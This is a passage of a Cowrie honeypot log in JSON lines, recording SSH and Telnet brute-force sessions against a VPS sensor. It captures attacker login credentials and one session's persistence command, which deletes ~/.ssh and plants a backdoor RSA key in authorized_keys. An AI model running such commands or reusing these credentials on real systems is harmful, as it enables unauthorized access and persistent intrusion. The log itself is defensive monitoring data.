0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.186.196:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x87:]\\x98\\x80\\xb0_| \\x8d\\xbd\\x19b\\x06>\\xfe\\xb5\\xd0\\xbd\\xd1\\xa0\\xaf\\x96W\\xf6>d\\xa7?[\\x8a\\xb8 \\x8e\\x01\\xe7\\x8f\\x15\\x1d7\\x80!\\n\\xf2\\xacm\\x1f]Vt\\xaa8?\\xda\\xae)\\x07\\xef4\\x13mo\\x8b<\\xc6\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 O&o\\x876\\xadQ/\\xf1\\xf8\\xed\\xceF\\x07o\\xaf\\x9d\\xe8U\\xab\\xe9p8\\xaa\\xd1q\\xf9\\x1656\\xfe\\x18\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T13:13:40.243591Z","src_ip":"194.0.234.21","session":"4a6ff4336904"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:13:40.488970Z","src_ip":"194.0.234.21","session":"4a6ff4336904"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35192,"dst_ip":"1.2.3.4","dst_port":22,"session":"078da1157c4b","protocol":"ssh","message":"New connection: 212.227.235.229:35192 (1.2.3.4:22) [session: 078da1157c4b]","sensor":"my-vps","timestamp":"2025-08-26T13:14:11.997438Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:14:12.598961Z","src_ip":"212.227.235.229","session":"078da1157c4b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T13:14:12.600185Z","src_ip":"212.227.235.229","session":"078da1157c4b"}
{"eventid":"cowrie.login.success","username":"root","password":"Mitul@123","message":"login attempt [root/Mitul@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:14:15.505347Z","src_ip":"212.227.235.229","session":"078da1157c4b"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:14:16.225713Z","src_ip":"212.227.235.229","session":"078da1157c4b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55594,"dst_ip":"1.2.3.4","dst_port":23,"session":"3d1c7a64dff3","protocol":"telnet","message":"New connection: 212.227.125.160:55594 (1.2.3.4:23) [session: 3d1c7a64dff3]","sensor":"my-vps","timestamp":"2025-08-26T13:14:24.395196Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:14:24.479212Z","src_ip":"212.227.125.160","session":"3d1c7a64dff3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:14:24.544042Z","src_ip":"212.227.125.160","session":"3d1c7a64dff3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59978,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bb5b30f326a","protocol":"ssh","message":"New connection: 212.227.235.229:59978 (1.2.3.4:22) [session: 9bb5b30f326a]","sensor":"my-vps","timestamp":"2025-08-26T13:14:33.506799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:14:33.507756Z","src_ip":"212.227.235.229","session":"9bb5b30f326a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:14:34.741837Z","src_ip":"212.227.235.229","session":"9bb5b30f326a"}
{"eventid":"cowrie.login.success","username":"root","password":"qazwsx123.","message":"login attempt [root/qazwsx123.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:14:35.495938Z","src_ip":"212.227.235.229","session":"9bb5b30f326a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:14:36.016700Z","src_ip":"212.227.235.229","session":"9bb5b30f326a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:14:36.017455Z","src_ip":"212.227.235.229","session":"9bb5b30f326a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:14:36.018645Z","src_ip":"212.227.235.229","session":"9bb5b30f326a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:14:36.271008Z","src_ip":"212.227.235.229","session":"9bb5b30f326a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:14:36.877253Z","src_ip":"212.227.235.229","session":"9bb5b30f326a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:14:36.878079Z","src_ip":"212.227.235.229","session":"9bb5b30f326a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:14:37.131265Z","src_ip":"212.227.235.229","session":"9bb5b30f326a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:14:37.132360Z","src_ip":"212.227.235.229","session":"9bb5b30f326a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59986,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cfd8482231b","protocol":"ssh","message":"New connection: 212.227.235.229:59986 (1.2.3.4:22) [session: 5cfd8482231b]","sensor":"my-vps","timestamp":"2025-08-26T13:14:37.377360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:14:37.378147Z","src_ip":"212.227.235.229","session":"5cfd8482231b"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:14:38.120322Z","src_ip":"212.227.235.229","session":"0b363f8056ca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:14:38.577793Z","src_ip":"212.227.235.229","session":"5cfd8482231b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:14:39.320147Z","src_ip":"212.227.235.229","session":"5cfd8482231b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43478,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8d061e86f86","protocol":"ssh","message":"New connection: 212.227.235.229:43478 (1.2.3.4:22) [session: a8d061e86f86]","sensor":"my-vps","timestamp":"2025-08-26T13:14:40.121858Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:14:40.122552Z","src_ip":"212.227.235.229","session":"a8d061e86f86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:14:40.367543Z","src_ip":"212.227.235.229","session":"a8d061e86f86"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:14:40.568484Z","src_ip":"212.227.235.229","session":"5cfd8482231b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59992,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab463f30d204","protocol":"ssh","message":"New connection: 212.227.235.229:59992 (1.2.3.4:22) [session: ab463f30d204]","sensor":"my-vps","timestamp":"2025-08-26T13:14:40.809841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:14:40.810796Z","src_ip":"212.227.235.229","session":"ab463f30d204"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:14:41.055134Z","src_ip":"212.227.235.229","session":"ab463f30d204"}
{"eventid":"cowrie.login.failed","username":"test","password":"abc","message":"login attempt [test/abc] failed","sensor":"my-vps","timestamp":"2025-08-26T13:14:41.389631Z","src_ip":"212.227.235.229","session":"a8d061e86f86"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:14:42.079316Z","src_ip":"212.227.235.229","session":"ab463f30d204"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:14:42.325921Z","src_ip":"212.227.235.229","session":"ab463f30d204"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:14:42.328333Z","src_ip":"212.227.235.229","session":"9bb5b30f326a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:14:42.636068Z","src_ip":"212.227.235.229","session":"a8d061e86f86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46064,"dst_ip":"1.2.3.4","dst_port":22,"session":"a50ba9138ac2","protocol":"ssh","message":"New connection: 212.227.235.229:46064 (1.2.3.4:22) [session: a50ba9138ac2]","sensor":"my-vps","timestamp":"2025-08-26T13:15:05.682993Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:15:05.683932Z","src_ip":"212.227.235.229","session":"a50ba9138ac2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:15:05.898317Z","src_ip":"212.227.235.229","session":"a50ba9138ac2"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-26T13:15:06.843434Z","src_ip":"212.227.235.229","session":"a50ba9138ac2"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:15:08.056791Z","src_ip":"212.227.235.229","session":"a50ba9138ac2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37514,"dst_ip":"1.2.3.4","dst_port":22,"session":"23df6b32f736","protocol":"ssh","message":"New connection: 212.227.235.229:37514 (1.2.3.4:22) [session: 23df6b32f736]","sensor":"my-vps","timestamp":"2025-08-26T13:15:56.435898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:15:56.437463Z","src_ip":"212.227.235.229","session":"23df6b32f736"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:15:56.682131Z","src_ip":"212.227.235.229","session":"23df6b32f736"}
{"eventid":"cowrie.login.failed","username":"rayan","password":"rayan","message":"login attempt [rayan/rayan] failed","sensor":"my-vps","timestamp":"2025-08-26T13:15:57.702378Z","src_ip":"212.227.235.229","session":"23df6b32f736"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:15:58.950421Z","src_ip":"212.227.235.229","session":"23df6b32f736"}
